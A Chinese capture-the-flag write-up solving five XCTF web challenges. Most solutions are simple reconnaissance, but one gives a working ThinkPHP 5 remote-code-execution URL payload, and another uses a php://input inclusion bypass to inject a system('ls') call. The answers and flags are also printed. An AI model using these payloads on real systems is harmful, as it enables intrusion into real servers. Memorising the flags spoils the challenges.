攻防世界web进阶区1-5题 write up
攻防世界web进阶区1-5题wp
文章目录
第一题:baby web
题目提示:想一想初始页面是哪个。F12查看,只有一个1.php的界面
然后把url后面的1.php去掉,可以直接得到flag
flag={very_baby_web}
第二题:Training-WWW-Robots
访问,出现如下的页面
题目的名字是Training-WWW-Robots,可能会与robots.txt协议有关,然后直接访问该协议,得到提示f10g.php
直接访问f10g.php页面,得到flag
flag=cyberpeace{6d8616f65a6c7b2925202fb6bcc124e1}
第三题:php rce
访问页面,出现以下内容
此为thinkphp5 rce漏洞,构造如下的payload即可
http://124.126.19.106:38036/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat ../../../flag");'
flag={thinkphp5_rce}
第四题:Web php include
访问,出现如下内容
strstr()函数:
1、搜索字符串在另一字符串中的第一次出现,该函数是二进制安全的。
2、该函数对大小写敏感。
进行php审计,构造: ?page=PHP://imput进行绕过,然后抓包发送到Repeater模块,添加<?php system("ls")?>查看文件
如图发现出现了三个文件,f14glslslsh3r3.php、index.php、phpinfo.php
范文这三个文件,访问f14glslslsh3r3.php时得到flag
flag=ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}
第五题:ics-06
访问,出现如下页面
根据题目提示,点击报表中心(点击其他模块也没有反应),出现如下页面,会发现在url后边多了个id=1
利用burp抓包,进行**,发现当id=2333时,跟其他的返回不一样
然会访问id=2333,得到flag
flag=cyberpeace{5dad9dd3e054180406bb53d808d0565c}